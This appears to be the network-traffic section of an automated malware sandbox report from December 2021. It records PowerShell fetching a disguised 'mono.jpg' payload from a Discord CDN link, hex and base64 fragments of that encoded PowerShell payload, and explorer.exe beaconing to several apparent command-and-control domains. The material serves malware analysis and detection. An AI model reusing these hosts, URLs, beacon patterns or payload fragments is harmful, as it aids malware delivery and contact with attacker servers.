                                                                Dec 2, 2021 21:47:22.662794113 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662832975 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662834883 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662844896 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662877083 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662890911 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662931919 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662934065 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662942886 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662976027 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662987947 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663028002 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.663032055 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663042068 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663073063 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.663084984 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663126945 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.663127899 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663136959 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663177013 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.663202047 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.663208961 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663222075 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663256884 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.663266897 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.663367033 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.670089960 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.679909945 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.680056095 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.680073023 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.680103064 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.680119038 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.680133104 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.680152893 CET49167443192.168.2.22162.159.135.233

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 2, 2021 21:47:21.201313972 CET5216753192.168.2.228.8.8.8
                                                                Dec 2, 2021 21:47:21.229415894 CET53521678.8.8.8192.168.2.22
                                                                Dec 2, 2021 21:47:21.232605934 CET5059153192.168.2.228.8.8.8
                                                                Dec 2, 2021 21:47:21.260137081 CET53505918.8.8.8192.168.2.22
                                                                Dec 2, 2021 21:47:22.224154949 CET5780553192.168.2.228.8.8.8
                                                                Dec 2, 2021 21:47:22.247909069 CET53578058.8.8.8192.168.2.22
                                                                Dec 2, 2021 21:48:34.272608995 CET5903053192.168.2.228.8.8.8
                                                                Dec 2, 2021 21:48:34.295955896 CET53590308.8.8.8192.168.2.22
                                                                Dec 2, 2021 21:48:54.862468004 CET5918553192.168.2.228.8.8.8
                                                                Dec 2, 2021 21:48:54.894236088 CET53591858.8.8.8192.168.2.22
                                                                Dec 2, 2021 21:49:15.158567905 CET5561653192.168.2.228.8.8.8
                                                                Dec 2, 2021 21:49:15.181938887 CET53556168.8.8.8192.168.2.22

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Dec 2, 2021 21:47:21.201313972 CET192.168.2.228.8.8.80x9e6Standard query (0)google.comA (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:21.232605934 CET192.168.2.228.8.8.80x782aStandard query (0)google.comA (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:22.224154949 CET192.168.2.228.8.8.80x8f75Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:48:34.272608995 CET192.168.2.228.8.8.80xc18cStandard query (0)www.vecydoy.xyzA (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:48:54.862468004 CET192.168.2.228.8.8.80x9c63Standard query (0)www.marcasemele.comA (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:49:15.158567905 CET192.168.2.228.8.8.80x30e0Standard query (0)www.lillianpsmith.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Dec 2, 2021 21:47:21.229415894 CET8.8.8.8192.168.2.220x9e6No error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:21.260137081 CET8.8.8.8192.168.2.220x782aNo error (0)google.com216.58.215.238A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:22.247909069 CET8.8.8.8192.168.2.220x8f75No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:22.247909069 CET8.8.8.8192.168.2.220x8f75No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:22.247909069 CET8.8.8.8192.168.2.220x8f75No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:22.247909069 CET8.8.8.8192.168.2.220x8f75No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:47:22.247909069 CET8.8.8.8192.168.2.220x8f75No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:48:34.295955896 CET8.8.8.8192.168.2.220xc18cNo error (0)www.vecydoy.xyz104.21.39.13A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:48:34.295955896 CET8.8.8.8192.168.2.220xc18cNo error (0)www.vecydoy.xyz172.67.142.28A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:48:54.894236088 CET8.8.8.8192.168.2.220x9c63No error (0)www.marcasemele.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                Dec 2, 2021 21:48:54.894236088 CET8.8.8.8192.168.2.220x9c63No error (0)gcdn0.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                Dec 2, 2021 21:48:54.894236088 CET8.8.8.8192.168.2.220x9c63No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                Dec 2, 2021 21:48:54.894236088 CET8.8.8.8192.168.2.220x9c63No error (0)5f36b111-balancer.wixdns.nettd-balancer-db4-63-177.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                Dec 2, 2021 21:48:54.894236088 CET8.8.8.8192.168.2.220x9c63No error (0)td-balancer-db4-63-177.wixdns.net185.230.63.177A (IP address)IN (0x0001)
                                                                Dec 2, 2021 21:49:15.181938887 CET8.8.8.8192.168.2.220x30e0No error (0)www.lillianpsmith.comlillianpsmith.comCNAME (Canonical name)IN (0x0001)
                                                                Dec 2, 2021 21:49:15.181938887 CET8.8.8.8192.168.2.220x30e0No error (0)lillianpsmith.com50.62.137.48A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • cdn.discordapp.com
                                                                • www.vecydoy.xyz
                                                                • www.marcasemele.com
                                                                • www.lillianpsmith.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.2249167162.159.135.233443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.2249168104.21.39.1380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Dec 2, 2021 21:48:34.325859070 CET1946OUTGET /t3t2/?s2MDa=cHQmaRhXG/vngEByS69ZQUNH+JDmxyaQFA1QwuukQiJPteqD3aI5HBNhKJ+idn/6LHxDHg==&aJ=btx8n42x9 HTTP/1.1
                                                                Host: www.vecydoy.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Dec 2, 2021 21:48:34.358432055 CET1947INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 02 Dec 2021 20:48:34 GMT
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 02 Dec 2021 21:48:34 GMT
                                                                Location: https://www.vecydoy.xyz/t3t2/?s2MDa=cHQmaRhXG/vngEByS69ZQUNH+JDmxyaQFA1QwuukQiJPteqD3aI5HBNhKJ+idn/6LHxDHg==&aJ=btx8n42x9
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0cB8E8retAxJ4XPvuCL3A6lYCV9cZaiaxomqjcc%2FiE%2BVl%2FJ3aCrVtuSclxRGJn4yhIQjUE0Eo5oYo0ETVN9TnFjLw2qvWDddeh4QSZrrJ0CAErMxYLoeArHR7gWXkK6Jgl0%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 6b776ab699b343b8-FRA
                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.2249170185.230.63.17780C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Dec 2, 2021 21:48:54.941313028 CET1948OUTGET /t3t2/?s2MDa=3Qj9oZZfewD59ZVrWkdF2G2Wunuif2Jlkx5S2y1tDqrPnVj26TOdvUTbk2/4ZHnYpFjC/w==&aJ=btx8n42x9 HTTP/1.1
                                                                Host: www.marcasemele.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.224917150.62.137.4880C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Dec 2, 2021 21:49:15.339907885 CET1949OUTGET /t3t2/?s2MDa=Y2xcL3ZkL7oVFMSzs9YHectEjMd2sfTUB3/xlHaDCcg2Dqhlo8BobNvGWm7cW+r/txQJ1w==&aJ=btx8n42x9 HTTP/1.1
                                                                Host: www.lillianpsmith.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Dec 2, 2021 21:49:15.553584099 CET1950INHTTP/1.1 404 Not Found
                                                                Date: Thu, 02 Dec 2021 20:49:15 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.4.23
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Link: <http://www.lillianpsmith.com/wp-json/>; rel="https://api.w.org/"
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 32 37 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 6f 74 68 69 6e 67 20 26 61 6d 70 3b 20 43 72 61 66 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 6f 74 68 69 6e 67 20 26 61 6d 70 3b 20 43 72 61 66 74 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6c 6c 69 61 6e 70 73 6d 69 74 68 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 6f 74 68 69 6e 67 20 26 61 6d 70 3b 20 43 72 61 66 74 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6c 6c 69 61 6e 70 73 6d 69 74 68 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 31 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                                Data Ascii: 2799<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <title>Page not found &#8211; Clothing &amp; Craft</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Clothing &amp; Craft &raquo; Feed" href="http://www.lillianpsmith.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Clothing &amp; Craft &raquo; Comments Feed" href="http://www.lillianpsmith.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w


                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.2249167162.159.135.233443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                2021-12-02 20:47:22 UTC0OUTGET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: cdn.discordapp.com
                                                                Connection: Keep-Alive
                                                                2021-12-02 20:47:22 UTC0INHTTP/1.1 200 OK
                                                                Date: Thu, 02 Dec 2021 20:47:22 GMT
                                                                Content-Type: image/jpeg
                                                                Content-Length: 1920730
                                                                Connection: close
                                                                CF-Ray: 6b7768f6595068e9-FRA
                                                                Accept-Ranges: bytes
                                                                Age: 8365
                                                                Cache-Control: public, max-age=31536000
                                                                ETag: "715fb9aa84b3e1c2f82643aa678b63dc"
                                                                Expires: Fri, 02 Dec 2022 20:47:22 GMT
                                                                Last-Modified: Thu, 02 Dec 2021 03:01:27 GMT
                                                                CF-Cache-Status: HIT
                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                Cf-Bgj: h2pri
                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                x-goog-generation: 1638414087319322
                                                                x-goog-hash: crc32c=W/97YQ==
                                                                x-goog-hash: md5=cV+5qoSz4cL4JkOqZ4tj3A==
                                                                x-goog-metageneration: 1
                                                                x-goog-storage-class: STANDARD
                                                                x-goog-stored-content-encoding: identity
                                                                x-goog-stored-content-length: 1920730
                                                                X-GUploader-UploadID: ADPycduSrW5es12_U_k0Srpza-5UUDKtE1KsqiLuM2xaG42GeTQLwFMAcFHR8vS438yfvq21coNfsyFYLr1r5n7Mw-LgeQf9Eg
                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TK48RkooYKpDJK7LxzB3GgB6FXKzhxF0QzzSIZaIJ3O2AshWWykO4xGV5bk3lrFUdR3FPRealFgsIoavQ4BTVdtZ%2Fhn%2FCBPNYt%2Br4PdtjnvZnq5L2JyUL6CJhsVSdEQ7ozm84g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                2021-12-02 20:47:22 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                2021-12-02 20:47:22 UTC1INData Raw: 56 33 4a 70 64 47 55 74 56 6d 56 79 59 6d 39 7a 5a 53 41 69 52 32 56 30 4c 55 52 6c 59 32 39 74 63 48 4a 6c 63 33 4e 6c 5a 45 4a 35 64 47 56 42 63 6e 4a 68 65 53 49 37 4a 47 45 39 4a 47 45 39 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 6e 65 7a 49 33 4f 44 45 33 4e 6a 46 46 4c 54 49 34 52 54 41 74 4e 44 45 77 4f 53 30 35 4f 55 5a 46 4c 55 49 35 52 44 45 79 4e 30 4d 31 4e 30 46 47 52 58 30 6e 4f 31 64 79 61 58 52 6c 4c 56 5a 6c 63 6d 4a 76 63 32 55 67 49 6b 64 6c 64 43 31 45 5a 57 4e 76 62 58 42 79 5a 58 4e 7a 5a 57 52 43 65 58 52 6c 51 58 4a 79 59 58 6b 69 4f 79 52 68 50 53 52 68 50 56 64 79 61 58 52 6c 4c 55 68 76 63 33 51 67 4a 33 73 79 4e 7a 67 78 4e 7a 59 78 52 53 30 79 4f 45 55 77 4c 54 51 78 4d 44 6b 74 4f 54 6c 47 52 53 31 43 4f 55 51 78 4d 6a 64
                                                                Data Ascii: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjd
                                                                2021-12-02 20:47:22 UTC3INData Raw: 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71
                                                                Data Ascii: ioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
                                                                2021-12-02 20:47:22 UTC4INData Raw: 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 49 67 30 4b 56 33 4a 70 64 47 55 74 53 47 39 7a 64 43 41 69 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b 69 6f 71 4b
                                                                Data Ascii: oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqIg0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqK
                                                                2021-12-02 20:47:22 UTC5INData Raw: 73 59 44 49 79 4c 47 42 43 52 53 78 67 52 6a 67 73 59 45 45 35 4c 47 41 7a 52 69 78 67 52 54 6b 73 59 45 51 33 4c 47 42 47 4f 43 78 67 51 6a 55 73 59 44 64 47 4c 47 41 34 52 43 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 63 31 4c 47 42 46 4f 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 45 5a 45 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 46 42 4c 47 41 33 52 69 78 67 52 44 63 73 59 45 46 47 4c 47 41 79 4d 53 78 67 51 30 59 73 59 45 56 47 4c 47 42 42 4f 53 78 67 4d 30 59 73 59 44 4d 33 4c 47 41 7a 52 43 78 67 4e 30 59 73 59 44 45 77 4c 47 42 47 52 43 78 67 52 6b 59 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 55 51 73 59 45 5a 46 4c 47 41 35 52 53 78 67 52 45 59 73 59 45 55 30 4c 47 42 45 4e 79 78 67 52 6a
                                                                Data Ascii: sYDIyLGBCRSxgRjgsYEE5LGAzRixgRTksYEQ3LGBGOCxgQjUsYDdGLGA4RCxgNUYsYEUzLGBENyxgRjgsYDc1LGBFOCxgRkYsYEZGLGBGNyxgRkYsYEZELGA2QixgRkMsYDFBLGA3RixgRDcsYEFGLGAyMSxgQ0YsYEVGLGBBOSxgM0YsYDM3LGAzRCxgN0YsYDEwLGBGRCxgRkYsYDM3LGBGOSxgNUQsYEZFLGA5RSxgREYsYEU0LGBENyxgRj
                                                                2021-12-02 20:47:22 UTC7INData Raw: 4e 53 78 67 52 54 67 73 59 44 64 47 4c 47 41 32 4d 43 78 67 4e 44 63 73 59 45 4e 43 4c 47 42 44 52 69 78 67 52 55 59 73 59 44 51 35 4c 47 42 47 52 69 78 67 4d 55 49 73 59 45 51 33 4c 47 41 33 4f 53 78 67 4e 54 6b 73 59 44 55 78 4c 47 41 30 4d 79 78 67 51 7a 59 73 59 44 4d 31 4c 47 41 31 4e 53 78 67 4d 55 45 73 59 45 5a 44 4c 47 41 78 4e 79 78 67 51 6b 51 73 59 44 63 32 4c 47 41 30 52 69 78 67 4f 44 49 73 59 44 42 47 4c 47 42 46 4f 43 78 67 4e 54 6b 73 59 45 5a 45 4c 47 42 46 52 69 78 67 52 44 49 73 59 45 55 32 4c 47 42 45 51 69 78 67 51 6b 59 73 59 44 41 32 4c 47 41 31 52 53 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 52 69 78 67 4f 45 51 73 59 44 5a 47 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 4a 47 4c 47 42 47 4e 69 78 67 51 55 59 73 59 45 59 78 4c 47 42
                                                                Data Ascii: NSxgRTgsYDdGLGA2MCxgNDcsYENCLGBDRixgRUYsYDQ5LGBGRixgMUIsYEQ3LGA3OSxgNTksYDUxLGA0MyxgQzYsYDM1LGA1NSxgMUEsYEZDLGAxNyxgQkQsYDc2LGA0RixgODIsYDBGLGBFOCxgNTksYEZELGBFRixgRDIsYEU2LGBEQixgQkYsYDA2LGA1RSxgRjksYDc1LGA3RixgOEQsYDZGLGBGRixgM0UsYEJGLGBGNixgQUYsYEYxLGB
